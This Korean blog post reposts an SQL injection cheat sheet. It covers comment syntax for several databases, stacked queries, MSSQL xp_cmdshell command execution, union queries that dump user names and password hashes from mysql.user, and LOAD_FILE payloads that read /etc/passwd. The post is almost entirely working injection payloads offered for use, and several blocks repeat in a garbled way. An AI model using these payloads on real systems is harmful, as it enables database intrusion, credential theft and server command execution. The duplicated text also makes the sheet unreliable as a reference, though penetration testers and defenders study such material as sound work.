반응형
출처: http://www.hahwul.com/p/sql-injection-cheat-sheet.html
DB 종류 별 주석(Line Comments)
MYSQL
단일주석: #
다중주석: /**/
MSSQL, ORACLE, POSTGRESQL
단일주석: --
다중주석: /**/
/*! */ : MSSQL 한정(높은버전)
MariaDB
단일주석: #
단일주석: --
다중주석: /**/
CUBRID
단일주석: --
단일주석: //
다중주석: /**/
단일주석: #
다중주석: /**/
MSSQL, ORACLE, POSTGRESQL
단일주석: --
다중주석: /**/
/*! */ : MSSQL 한정(높은버전)
MariaDB
단일주석: #
단일주석: --
다중주석: /**/
CUBRID
단일주석: --
단일주석: //
다중주석: /**/
; Stacking Queires
Example
SELECT * FROM TEST [] WHERE id="1"
SELECT * FROM TEST [;SQL --] WHERE id="1"
SELECT * FROM TEST [] WHERE id="1"
SELECT * FROM TEST [;SQL --] WHERE id="1"
시스템 명령 실행
xp_cmdshell { 'command_string' } [ , no_output ]
Union Injection
MYSQL - Command
SELECT @@version
SELECT user();
SELECT system_user();
SELECT user, password FROM mysql.user;
SELECT @@datadir;
SELECT @@hostname;
SELECT user();
SELECT system_user();
SELECT user, password FROM mysql.user;
SELECT @@datadir;
SELECT @@hostname;
Load file
UNION ALL SELECT LOAD_FILE('/etc/passwd') --
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
반응형
'프로젝트 관련 조사 > 모의 해킹' 카테고리의 다른 글
| XSS 시 <> 우회 방법 (0) | 2016.10.27 |
|---|---|
| HIDDEN:XSS - XSS in hidden field input(input -> hidden에서의 XSS) (0) | 2016.10.27 |
| 무료 SQL 인젝션 스캐너 15 제품 요약 정리 (0) | 2016.10.27 |
| XSS 공격 종류 (0) | 2016.10.27 |
| Burp suite 한글깨짐 현상 (1) | 2016.10.26 |